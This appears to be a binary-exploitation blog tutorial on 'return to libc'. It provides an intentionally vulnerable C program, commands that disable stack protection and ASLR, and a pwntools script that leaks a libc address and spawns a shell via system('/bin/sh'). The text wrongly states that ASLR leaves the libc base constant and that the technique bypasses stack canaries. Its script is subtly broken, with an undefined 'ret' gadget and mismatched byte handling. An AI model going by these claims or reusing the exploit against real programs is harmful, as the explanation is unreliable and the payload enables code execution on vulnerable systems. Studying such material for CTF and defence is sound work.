Binary Exploitation Series
Introduction
Welcome to the fascinating world of binary exploitation, where we delve into the intricate art of manipulating computer programs to gain unauthorized access, uncover vulnerabilities, and expand our understanding of software security. In this blog post, we’ll embark on a journey into the technique known as “return to libc,” a classic method employed by exploit developers to bypass security mechanisms and gain control of a vulnerable program.
As technology advances, so do the complexities and challenges associated with securing software systems. To ensure robustness, developers implement various defense mechanisms, such as address space layout randomization (ASLR), stack canaries, and non-executable stack (NX). However, even the most fortified applications can sometimes possess vulnerabilities that clever attackers can exploit.
At its core, “return to libc“ is a technique used to bypass these security measures by manipulating the program’s control flow and leveraging existing functions within the C library (libc) to achieve arbitrary code execution. This technique relies on the fact that the C library is loaded into the memory space of every executable, making it a valuable resource for attackers seeking to execute code in the context of the exploited program.
The beauty of return to libc lies in its ability to evade the security mechanisms mentioned earlier. ASLR, for example, randomizes the memory locations of key program components, making it harder for attackers to predict addresses accurately. However, the C library’s base address remains constant across different runs of the same program, allowing us to locate and utilize its functions reliably.
/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space */
#include <stdio.h>
#include <unistd.h>
int vuln() {
char buf[80];
int r;
r = read(0, buf, 400);
printf("\nRead %d bytes. buf is %s\n", r, buf);
puts("No shell for you :(");
return 0;
}
int main(int argc, char *argv[]) {
printf("Try to exec /bin/sh");
vuln();
return 0;
}
Exploiting “return to libc“ allows an attacker to achieve various malicious objectives. Here are a few examples:
- Execute Arbitrary Shell Commands: By redirecting the control flow to the
system()
function from the C library, an attacker can execute arbitrary shell commands within the context of the exploited program. This provides them with unauthorized access and control over the system, enabling them to perform actions like modifying files, stealing data, or even launching further attacks. - Privilege Escalation: If the exploited program runs with elevated privileges, such as running as a privileged user or setuid binary, an attacker can leverage “return to libc” to escalate their privileges. By executing functions like
setuid()
orexecve()
from the C library, the attacker can gain higher privileges, enabling them to perform actions that would otherwise be restricted. - Bypass Security Mechanisms: “Return to libc” can be used to bypass various security mechanisms implemented by the operating system or the compiler. For example, if the program is protected with address space layout randomization (ASLR), which randomizes the memory addresses, an attacker can still determine the address of the C library functions since they are loaded at a predictable base address. Similarly, stack canaries, which aim to detect stack-based buffer overflows, can be bypassed by avoiding the overwrite of the canary value and instead redirecting the control flow to the C library functions.
Steps in order to achieve a full return to libc chain payload:
- the padding until we begin to overwrite the RIP ( instruction pointer )
- a pop rdi gadget that allows you to pop a value from the stack into the
rdi
register, which is commonly used for passing the first argument to functions in the x86-64 calling convention. You can search for such gadgets using tools like ROPgadget or by analyzing the binary with tools like objdump or Ghidra. - Locate the
puts@plt
entry: Theputs@plt
entry is the address of the PLT (Procedure Linkage Table) entry for theputs()
function. The PLT is a mechanism used for dynamic function resolution in the binary. You can find the address ofputs@plt
by examining the binary with tools like objdump or Ghidra. - Locate the
puts@got
entry: Theputs@got
entry is the Global Offset Table (GOT) entry for theputs()
function. The GOT stores the actual addresses of dynamically linked functions. You can find the address ofputs@got
by examining the binary with tools like objdump or Ghidra. - Execute the payload: Send the payload to the vulnerable program, triggering the exploitation process. The payload should cause the program to execute the
pop rdi
gadget, which will load theputs@got
address intordi
, and then callputs@plt
to print the leaked address. - Extract the leaked libc address: Once the program is executed, it will print the leaked address of the
puts()
function from the GOT. This address can be used to calculate the base address of the loaded libc library by subtracting the offset ofputs()
in libc. With the libc base address, you can find other libc functions for further exploitation.
How does the leak work
The leak works by taking advantage of the Global Offset Table (GOT) and the Procedure Linkage Table (PLT) entries in the binary, along with a pop rdi
gadget, to obtain the address of the puts()
function from the libc library.
- GOT Entry for
puts()
: The GOT is a table that holds the addresses of dynamically linked functions. When a function from an external library, such asputs()
, is called, the program resolves the address from the GOT. Initially, the GOT entry forputs()
contains the address of the corresponding entry in the PLT. - PLT Entry for
puts()
: The Procedure Linkage Table (PLT) is a mechanism used for dynamic function resolution. The PLT entry forputs()
is a small piece of code responsible for looking up and resolving the actual address of theputs()
function in the libc library. pop rdi
gadget: Apop rdi
gadget is a sequence of instructions in the binary that pops a value from the stack into therdi
register. Therdi
register is commonly used for passing the first argument to functions in the x86-64 calling convention.- Crafting the Payload: The payload is crafted by constructing a sequence of addresses and instructions. It typically starts with the address of the
pop rdi
gadget, followed by the address of theputs@got
entry, and finally, the address of theputs@plt
entry. - Execution of the Payload: When the vulnerable program executes the crafted payload, it first encounters the
pop rdi
gadget. This instruction pops the next value from the stack into therdi
register, which is the address of theputs@got
entry. - Calling
puts@plt
: After thepop rdi
gadget, the execution flow reaches the address of theputs@plt
entry. The code at this address transfers control to the PLT entry forputs()
, which resolves and jumps to the actual address of theputs()
function in libc. - Printing the Leaked Address: The
puts()
function is called with the address of theputs@got
entry in therdi
register. Since theputs@got
entry initially contains the address of the corresponding PLT entry,puts()
will print this address. This address represents the leaked libc address.
Finding the Padding
The fastest way to find the padding is by using gdb-peda which haves a function called pattern create that will generate a string based on a lenght.
After we have created the cyclic pattern we can type r
in order to start the program. When the program asks for the user input just paste the pattern and press ENTER
We can see that the program crashed at 0x00005555555551ac
in vuln()
Using the command pattern search
, it will search in the registers for the pattern.
Using the Information
Using this information we can see that in order to overwrite the RSP register ( stack pointer ) we need to give it 104 random bytes. Knowing this is a 64 bit architecture the offset to the RIP should be RSP+8.
This means that the next 8 bytes after the 104 offset will overwrite the instruction pointer.
Find a rdi gadget
This process is quiet simple because there are some tools that will automatically find the gadgets for us: https://github.com/JonathanSalwan/ROPgadget
python3 ROPGadget.py --binary ./vuln
Putting it Together
In order to test this we will create a script in python using pwntools ( https://docs.pwntools.com/en/stable/install.html )
The pwntools library is a powerful and widely used Python library designed for binary exploitation, particularly in the context of Capture The Flag (CTF) competitions and exploit development. It provides a comprehensive set of tools and utilities to assist in various stages of exploit development, including remote communication, payload generation, and exploitation techniques.
from pwn import *
#context.log_level='DEBUG'
p = process("./vuln")
elf = ELF("./vuln", checksec=False)
libc = elf.libc
rop = ROP(elf)
def start():
if not args.REMOTE:
return process("./vuln")
else:
return remote("localhost", 1337)
p = start()
def main():
global rop
pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0]
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']
payload = b""
payload += b"A"*104
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
p.sendline(payload)
p.recvline()
p.recvline()
leaked_puts = u64(p.recvline().strip().ljust(8, "\x00"))
log.info("puts@leak: " + hex(leaked_puts))
libc.address = leaked_puts - libc.symbols['puts']
system = libc.symbols['system']
bin_sh = next(libc.search(b"/bin/sh"))
payload = b""
payload += b"A"*104
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
p.sendline(payload)
p.interactive()
if __name__=="__main__":
main()
Explanation
Leak the Address of
puts()
: The exploit begins by constructing a payload. It starts with a buffer overflow, filling 104 bytes of padding followed by the address of apop rdi
gadget. This gadget will load the next value from the stack into therdi
register. The payload then includes the address of theputs@got
entry (the Global Offset Table entry for theputs()
function) and the address of theputs@plt
entry (the Procedure Linkage Table entry forputs()
). This payload is sent to the vulnerable program.Retrieve the Leaked Address: After sending the payload, the program receives three lines of output. The third line contains the leaked address of
puts()
from the GOT. The code captures this value, converts it to an integer, and calculates the base address of the libc library by subtracting the offset ofputs()
in libc.Calculate Addresses: Using the leaked libc base address, the exploit computes the addresses of the
system()
and/bin/sh
strings in libc. These addresses are required to execute shell commands.Construct the Final Payload: The payload is constructed similarly to before, with a buffer overflow and padding. It includes a
pop rdi
gadget, the address of/bin/sh
, and the address ofsystem()
.Send the Final Payload: The payload is sent to the vulnerable program, which causes it to execute the
system("/bin/sh")
command, providing a shell with escalated privileges.Interactive Shell: Finally, the exploit enters an interactive shell, allowing the user to interact with the compromised system.
In conclusion, “return to libc” exploitation is a powerful technique that allows attackers to leverage the functionality of libc functions to achieve their malicious objectives. By redirecting the control flow to the C library, attackers can execute arbitrary shell commands, escalate privileges, bypass security mechanisms, and even achieve remote code execution.
Remember, the goal is not only to understand and exploit vulnerabilities but also to contribute to a safer digital landscape. By sharing knowledge, collaborating, and working together, we can collectively raise the bar on software security and protect against potential threats.
So, let’s continue to learn, innovate, and make a positive impact in the world of cybersecurity. Together, we can build resilient systems and stay one step ahead of those who seek to compromise them.